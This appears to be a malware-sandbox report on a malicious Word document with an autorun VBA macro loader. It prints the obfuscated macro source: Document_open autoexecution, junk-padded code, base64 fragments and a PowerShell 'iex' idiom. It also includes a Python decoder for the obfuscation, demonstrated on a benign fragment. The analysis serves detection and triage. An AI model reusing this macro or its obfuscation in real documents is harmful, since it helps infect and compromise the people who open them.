Verdict: MALICIOUS
Risk Score: 184
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. Its 'Document_open' procedure runs automatically when the document is opened; in the preview it invokes 'Application.Run' with a procedure name assembled by string concatenation, and the macro source also contains a 'Shell()' call (heuristic OLE_VBA_SHELL), indicating an attempt to execute external code. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' on the document and the extracted 'macros.bas' module further support its malicious nature. The macro is heavily obfuscated: every procedure is padded with junk assignments ('CDbl', 'Sgn' and 'CStr' of random constants), string arguments are wrapped in junk characters and trimmed by a helper ('tUscl', whose definition is outside the preview and which plausibly behaves like 'Mid()'), its numeric arguments are hidden behind 'x - x + N + x - x' arithmetic that evaluates to N, and the trimmed pieces are base64 strings whose 'AGEAMgAy...' shape is characteristic of UTF-16LE text. One plaintext fragment, "$sHeLLid[1]+$SHElLiD[13]+'X'", is a well-known PowerShell trick: '$ShellId' is the string 'Microsoft.PowerShell', so characters 1 and 13 followed by 'x' spell 'iex' (Invoke-Expression), and the adjacent '[Runtime.InteropServices.Marshal]::' reference is the usual companion for decoding a string in memory before executing it. Together with the 'Shell()' call, this points to a loader that assembles a PowerShell command at run time to download and execute a secondary payload.
Heuristics (6)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro, which executes automatically when the document is opened
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace that appears in ordinary Office files and is not an indicator on its own.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42254 bytes |

SHA-256: ca8cf551315d2145c9a33f1ec9a0feacdb13414b9a5a4c3c13228a5bc0b615da

Detection (for the carved macros.bas, not the parent document):
- ClamAV: No threats found. The Emodldr detection listed above fired on the document itself; the decoded VBA source alone is not matched by ClamAV.
- Obfuscation or payload: likely. Carved artifact contains 15 long base64-like blob(s).

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "twmjPBkM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
hHIkY = CDbl(71630)
vMbYCd = Sgn(56778)
jnrCj = PPOzT
lQizQ = 58275
MqiwrQ = CStr(88398)
SEcqT = OFLVoq
Application.Run SstmF + "fPvppijLNCzsU" + EfdbI, fQJCq + ziMoNjEo + lmpwK
GzcXKX = CDbl(57104)
nvuwkK = Sgn(73587)
plocT = odEDU
CENVh = 14368
FmhVGz = CStr(62988)
jWLSjO = zDHiSo
End Sub
Attribute VB_Name = "wSGCIZih"
Sub QcijP(Qiinh)
HtloH = CDbl(36585)
KNzpr = Sgn(89618)
PODpHC = zupBh
pnZDf = 14110
rYVNB = CStr(12093)
WLRnmm = sCfpfi
End Sub
Function ziMoNjEo()
On Error Resume Next
jORaLD = CDbl(98364)
XXvzB = Sgn(54965)
KhFRR = jzQRRB
aFNzrP = 37169
aYbFq = CStr(59048)
WQGNnX = dNmsU
vqczwp = tUscl("sAGEAMgAyAGMANABlADMAYgA2AGUANwBlAGUANwBhADEAZQAzAGIANQBhAGEAZAAyAGEAYwA2ADYANwAwADEAOAAyADMAMQAxAGEANAA0ADkAMQ@pzCT2", JIsfSk - JIsfSk + 2 + JIsfSk - JIsfSk, JIsfSk - JIsfSk + 110 + JIsfSk - JIsfSk)
RBItCT = CDbl(93550)
KwFmJ = Sgn(4612)
JiMazz = zLEOIT
AKzvWr = 48248
hDXiT = CStr(22866)
BbdUW = iaRXw
dlifSS = CDbl(30971)
aEdhL = Sgn(78593)
uIaXRd = YwjXX
UNQaRK = 87341
ANlFCL = CStr(67534)
zXiBjG = dpbPd
izvZDzr = tUscl("Kv5&( $sHeLLid[1]+$SHElLiD[13]+'X')( ([rUNTIMe.INteRopsErviCes.MaRsHaL]::([rUNtime.iNTqsF,", BzonLc - BzonLc + 4 + BzonLc - BzonLc, BzonLc - BzonLc + 83 + BzonLc - BzonLc)
lwvuR = CDbl(66163)
oCPBv = Sgn(63126)
upSPRR = zIpVON
mkpuP = 61688
PpKkd = CStr(42595)
wIjGCN = nXMwM
oKRQKz = CDbl(88800)
mipkmb = Sgn(84003)
IpYmOz = jaYsm
mWOXOV = 61714
ssHCZ = CStr(79298)
MVdvE = VOwfUp
diuftzt = tUscl("hsdsIHwAZAAxADkAMQAxAGQAZAA1ADUAZQBlADgANQBjADgANQBiAGMAMAA4AGYAYQBhADEAZQBmAGYAZQA1ADEAOQBhADYAYQAyADMANgA0AGEAoR", npGZC - npGZC + 6 + npGZC - npGZC, npGZC - npGZC + 107 + npGZC - npGZC)
kplFH = CDbl(14560)
LaMXGL = Sgn(70484)
zRjpJ = TFvwi
RIQsuj = 61513
CGBvR = CStr(79899)
mJGpsH = Qjwif
pURToK = CDbl(80374)
TdOqlG = Sgn(70723)
BQRqOa = ztpdzl
hqKHAB = 88955
kBjNv = CStr(35826)
hjVcb = qtANP
pFiRbBwp = tUscl(",DUAYwAyADQAMQBjAGEAMQA1AGMANQBiADkAZAA4ADEAOABhAGYAZABmADgAMAAxADYAOAA0ADQAYwAxADcANwAxADYAYQBlAGUAYQBiAGMAMAA2AGQAZQBiAGIAYwBkADkAZgA3ADIAZQA5ADYANgAyADIANAA4ADIAMgAwADEAYwA0ADEAMAAxAGMAZgA4AG.zXO@z2", QkqJZV - QkqJZV + 2 + QkqJZV - QkqJZV, QkqJZV - QkqJZV + 193 + QkqJZV - QkqJZV)
SZzjs = CDbl(146)
vYfiGi = Sgn(76358)
jPGBid = MIIVJa
wKtkdc = 64507
VrNFXn = CStr(3486)
PtoIJ = tMkviN
UjlJp = CDbl(83441)
QKRZB = Sgn(82699)
DbOYPP = MljGa
oZvfG = 54272
AYTtfj = CStr(85367)
rjUQsn = CaaYdT
tEsZAB = tUscl("fZFYwA1AGIAMQA4ADIAZAA4AGUAZQA1ADgANgAxADkAMwBlADMAMwA5AGQAMABkADcANgA2AGYAMAAxADAAMQAxADIAZgBhADkAZQAyADUANwA1AGUAMwBlADcAOABiAfA4s", YWqPDb - YWqPDb + 4 + YWqPDb - YWqPDb, YWqPDb - YWqPDb + 125 + YWqPDb - YWqPDb)
wCDPn = CDbl(62068)
OlTZOz = Sgn(59821)
UtiXa = EOphP
WVEiw = 18622
aQqQtM = CStr(70012)
vBqipF = FhpGsn
TrzOJu = CDbl(4570)
EXEXH = Sgn(10417)
imibn = JjUcm
ifBHhR = 76565
AkZsiM = CStr(75104)
wWCApX = pHVmO
kLKXO = tUscl("d1AFUAaAB0ADEATwBFADIAbgA1AEUAWAB6ADEAMgBZAHgAMgBUAEEAPQA9AK2Hj08G", nNhXcU - nNhXcU + 2 + nNhXcU - nNhXcU, nNhXcU - nNhXcU + 58 + nNhXcU - nNhXcU)
KcmWD = CDbl(45593)
DPWGTP = Sgn(46653)
NqwbmT = zZmBHf
AMiYf = 79916
nVaoE = CStr(73152)
AwjZzC = RYKcqa
mlwChs = CDbl(86909)
HwQbkl = Sgn(39157)
nuwAB = EINUl
aKmQKb = 88773
LvNbUJ = CStr(52898)
zEDzmw = svOfYh
rzaos = tUscl("VQBlAGQAMgA4ADIAZAA3ADkANgBmAGQAYgA3ADcAOQA0AGQANAA0AGUAYwBiADIAZgA5ADgAOQBmADMAMwA4AGQAYwBlADgAMwBjADAAMwA3ADE1Yw5Z", MjCQCs - MjCQCs + 2 + MjCQCs - MjCQCs, MjCQCs - MjCQCs + 110 + MjCQCs - MjCQCs)
pNGQQz = CDbl(23031)
RIrkBs = Sgn(64589)
jsmFI = Qlqii
UvwVDX = 11192
UDsinz = CStr(74938)
ICunLZ = nlbffw
FSWQc = CDbl(13232)
DimkIi = Sgn(2138)
fnwXF = jLjEmC
kndNB = 63669
mPwCuK = CStr(82284)
LEwJp = nCHwB
nVTRCwMwG = tUscl("a4RXADQAOQBlAGUAOQA1ADQAOQA5AGEA
... (truncated)
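The string-hiding pattern in the preview (junk-wrapped strings trimmed by 'tUscl' with arithmetic-noise arguments, base64 of UTF-16LE text, and the "$ShellId[1]+$ShellId[13]+'x'" idiom) can be unwound with a short triage script. The following is an added example written for this report, not code from the analyzer or from the sample. It assumes that 'tUscl(s, start, length)' behaves like VBA 'Mid()' (its definition is not in the preview), that the trimmed slices concatenate into one base64 string of UTF-16LE text, and it runs against a constructed macro fragment built inside the script rather than the sample's real blobs, whose full set is truncated above.

```python
"""Decoder for the string-hiding pattern seen in the macro preview.

Added example, not code from the analyzer or from the sample.
Assumptions: tUscl(s, start, length) behaves like VBA Mid() (1-based
start); 'v - v + N + v - v' reduces to N; the trimmed slices join into
one base64 string of UTF-16LE text. The macro text used below is
constructed for this demo, not taken from the sample.
"""
import base64
import re

# One call of the form: name = tUscl("<blob>", <arith>, <arith>)
CALL_RE = re.compile(r'tUscl\("([^"]*)"\s*,\s*([^,()]+?)\s*,\s*([^,()]+?)\s*\)')
ARITH_OK = re.compile(r"[\w\s+\-]+")          # identifiers, digits, + and - only
TERM_RE = re.compile(r"([+-]?)\s*(\d+)")
# PowerShell idiom: $ShellId is "Microsoft.PowerShell", so [1]+[13]+'x' is "iex"
IEX_IDIOM = re.compile(r"\$shellid\[1\]\s*\+\s*\$shellid\[13\]\s*\+\s*'x'", re.I)


def eval_noise_arith(expr: str) -> int:
    """Reduce 'JIsfSk - JIsfSk + 2 + JIsfSk - JIsfSk' to 2.

    'v - v' cancels for any numeric v (and the macro's undeclared Variants
    are Empty, i.e. 0, anyway), so every identifier is replaced by 0 and the
    signed integer terms are summed. Anything but + and - is refused.
    """
    if not ARITH_OK.fullmatch(expr.strip()):
        raise ValueError(f"unsupported arithmetic: {expr!r}")
    zeroed = re.sub(r"[A-Za-z_]\w*", "0", expr)
    total = 0
    for sign, digits in TERM_RE.findall(zeroed):
        total += -int(digits) if sign == "-" else int(digits)
    return total


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(): 1-based start, at most `length` characters."""
    if start < 1:
        raise ValueError("Mid() start must be >= 1")
    return s[start - 1 : start - 1 + length]


def recover_slices(vba_source: str) -> list[str]:
    """What each tUscl(...) call yields, in source order (Mid() assumption)."""
    return [
        vba_mid(blob, eval_noise_arith(start), eval_noise_arith(length))
        for blob, start, length in CALL_RE.findall(vba_source)
    ]


def decode_utf16le_b64(b64: str) -> str:
    """Base64 of UTF-16LE text shows the telltale 'AGEAMgAy...' shape."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def recover_payload(vba_source: str) -> str:
    return decode_utf16le_b64("".join(recover_slices(vba_source)))


def shellid_trick() -> str:
    """What $ShellId[1]+$ShellId[13]+'x' evaluates to in PowerShell."""
    shell_id = "Microsoft.PowerShell"
    return shell_id[1] + shell_id[13] + "x"


def flag_iex(ps_text: str) -> bool:
    return IEX_IDIOM.search(ps_text) is not None


def build_demo_macro() -> str:
    """Constructed stand-in for the sample (not its real blobs): two tUscl()
    calls whose trimmed slices join into base64(UTF-16LE) of a small
    PowerShell one-liner that uses the $ShellId iex idiom."""
    ps = "( $ShellId[1]+$ShellId[13]+'x')('Write-Host demo')"
    b64 = base64.b64encode(ps.encode("utf-16-le")).decode("ascii")
    half = len(b64) // 2
    lines = []
    for i, chunk in enumerate((b64[:half], b64[half:])):
        junk_pre, junk_post = "zq" * (i + 1), "@Kc"   # junk wrapped around the data
        start = len(junk_pre) + 1                     # 1-based, just past the prefix
        lines.append(
            f'v{i} = tUscl("{junk_pre}{chunk}{junk_post}", '
            f"n{i} - n{i} + {start} + n{i} - n{i}, n{i} - n{i} + {len(chunk)} + n{i} - n{i})"
        )
    return "\n".join(lines)


if __name__ == "__main__":
    macro = build_demo_macro()
    print(macro)
    payload = recover_payload(macro)
    print("decoded:", payload)
    print("iex idiom present:", flag_iex(payload), "->", shellid_trick())
```

Against a real dump, feed the whole 'macros.bas' to 'recover_slices' and inspect the slices before joining them: the sample mixes plaintext PowerShell fragments (the '$ShellId' piece) with base64 chunks, so the pieces may need to be grouped by which variable they are concatenated into rather than joined blindly.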